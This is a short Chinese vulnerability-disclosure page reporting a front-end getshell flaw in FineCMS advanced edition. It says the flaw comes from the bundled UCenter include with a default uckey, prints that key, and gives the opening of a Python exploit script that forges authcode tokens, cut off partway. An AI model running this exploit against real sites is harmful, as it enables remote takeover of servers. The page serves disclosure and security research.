FineCMS高级版前台getshell(demo成功)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: demo也shell了哦 ### 详细说明: 看到\member\api\uc.php ``` define('DISCUZ_ROOT', dirname(dirname(dirname(__FILE__))).'/member/ucenter/'); include DISCUZ_ROOT.'api/uc.php'; ``` 就是包含了uc的那个插件。但是这个功能只有高级版才有,免费版没有 然后uckey都是默认的 ``` 8808cer8o1UJsEpt2G2Jn0uhEn/YgEva589Mfo0 ``` 然后就可以直接getshell了 附上脚本 ``` #! /usr/bin/env python #coding=utf-8 import hashlib import time import math import base64 import urllib import urllib2 import sys def microtime(get_as_float = False) : if get_as_float: return time.time() else: return '%.8f %d' % math.modf(time.time()) def get_authcode(string, key = ''): ckey_length = 4 key = hashlib.md5(key).hexdigest() keya = hashlib.md5(key[0:16]).hexdigest() keyb = hashlib.md5(key[16:32]).hexdigest() keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:] cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() key_length = len(cryptkey) string = '0000000000' +...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息